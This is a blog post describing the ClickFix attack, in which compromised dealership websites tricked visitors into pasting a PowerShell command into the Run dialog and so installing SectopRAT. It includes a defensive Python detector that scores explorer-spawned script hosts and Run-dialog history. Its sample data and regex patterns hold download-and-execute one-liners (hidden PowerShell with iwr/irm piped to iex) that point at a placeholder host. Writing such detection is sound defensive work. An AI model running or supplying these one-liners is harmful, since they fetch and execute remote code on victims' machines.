The ClickFix attack tactic seems to be gaining traction among threat actors. Over 100 auto dealerships were abused in a supply chain attack that originated from a compromised shared video service used specifically by dealerships. While active, the attack presented dealership website visitors with a ClickFix lure that led to a SectopRAT malware infection.
When a user visited any of the more than 100 dealership websites, there was a chance that a specific JavaScript file containing malicious code would load. If it did, it redirected the user to a page on a compromised host that prompted them with the increasingly familiar reCAPTCHA-style “I’m not a robot” check:
Clicking the “I’m not a robot” checkbox actually supplied the user interaction that a page typically needs before a script may write to the clipboard, letting the JavaScript copy a malicious execution string onto the visitor’s clipboard. The malicious JavaScript then extended the “I’m not a robot” dialog with a drop-down list of additional “verification steps” for the user to perform:
The visitor was then instructed to open the Windows Run dialog by pressing the Windows key and ‘R’, which gives the Run field keyboard focus. The next instruction was to press CTRL+V, which pasted the malicious command that the JavaScript had pre-loaded onto the clipboard into the Run field – all of this happening without the end user knowing what was really going on in the background.
The final “CAPTCHA” step instructed the user to press Enter.
When the user performed these steps, a PowerShell script was executed on the user’s machine that downloaded further malware payloads and ultimately installed the SectopRAT remote access trojan. This attack is diabolically clever, and I believe it exposes a fundamental problem that doesn’t have a simple solution – the human factor.
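The chain just described leaves two artifacts a defender can look for: a script host (powershell.exe, mshta.exe, cmd.exe) spawned by explorer.exe with a download-and-execute one-liner, and the pasted text itself, which Windows records in the Run dialog history (the RunMRU registry values). The triage helper below is an added example written for this post, not code from the article or from the Dark Reading report; the event records, RunMRU strings, indicator list and weights are all constructed and illustrative.

```python
"""
Triage helper for the ClickFix pattern: a user pastes a clipboard-staged
command into the Windows Run dialog, so explorer.exe spawns a script host
with a download-and-execute command line.

Two signals are scored:
  1. Process-creation events (Sysmon Event ID 1 style fields, constructed
     below) whose parent is explorer.exe and whose child is a script host.
  2. Run-dialog history strings, as stored under
     HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
     (each value ends with a literal "\1" sentinel); the pasted command
     survives there after the PowerShell process has exited.
Indicator weights are illustrative assumptions, not tuned on real data.
"""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# (regex, weight, label). The trailing "# ... not a robot" comment is a
# commonly reported lure that makes the Run dialog text look benign.
INDICATORS = [
    (re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I), 2, "hidden window"),
    (re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3, "encoded command"),
    (re.compile(r"\b(iwr|invoke-webrequest|invoke-restmethod|irm|curl|wget|"
                r"downloadstring|downloadfile)\b", re.I), 3, "remote download"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), 3, "invoke-expression"),
    (re.compile(r"https?://", re.I), 1, "url"),
    (re.compile(r"-nop\b|-noprofile\b", re.I), 1, "no profile"),
    (re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I), 1, "execution policy bypass"),
    (re.compile(r"#.*(robot|verif)", re.I), 2, "human-verification bait"),
]


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_command(cmd: str) -> tuple[int, list[str]]:
    """Sum indicator weights found in a command line; return (score, labels)."""
    score, hits = 0, []
    for rx, weight, label in INDICATORS:
        if rx.search(cmd):
            score += weight
            hits.append(label)
    return score, hits


def triage_process_event(ev: ProcessEvent, threshold: int = 4):
    """Flag explorer.exe -> script host launches with a suspicious command line."""
    if basename(ev.parent_image) != "explorer.exe":
        return None
    child = basename(ev.image)
    if child not in SCRIPT_HOSTS:
        return None
    score, hits = score_command(ev.command_line)
    if score < threshold:
        return None
    return {"image": child, "score": score, "indicators": hits}


def triage_runmru(entries, threshold: int = 4):
    """Score Run-dialog history values; strip the "\\1" sentinel first."""
    findings = []
    for raw in entries:
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        score, hits = score_command(cmd)
        if score >= threshold:
            findings.append((cmd, score, hits))
    return findings


# Constructed sample telemetry; example.invalid is a reserved, non-routable name.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -nop -c "iex (iwr http://example.invalid/update.txt).Content"'
                 " # I am not a robot - reCAPTCHA Verification"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcessEvent(r"C:\Program Files\Code\Code.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -NoProfile -File build.ps1"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd /c dir"),
]

SAMPLE_RUNMRU = [
    "notepad\\1",
    "\\\\fileserver\\share\\1",
    'powershell -ep bypass -w h -c "irm http://example.invalid/a | iex"\\1',
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage_process_event(ev))
    for cmd, score, hits in triage_runmru(SAMPLE_RUNMRU):
        print(score, hits, cmd)
```

The parent-process check matters: PowerShell launched by a developer tool or a scheduled task scores nothing here, while the same one-liner pasted into the Run dialog does. In a real deployment the RunMRU values would be read from each user's hive rather than from the constructed list, and the weights should be tuned against the environment's own baseline of Run-dialog usage.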
The important point is that tech-savvy PC users are still in the minority. The vast majority of PC users have been trained simply to “follow instructions”, which has always been their way of life in the PC world.
Even though this particular attack was limited to automotive dealerships, we can expect these types of challenges to become more sophisticated and to be used against us in many different ways.
Read more here:
https://www.darkreading.com/cyberattacks-data-breaches/compromised-car-dealership-websites-clickfix-breach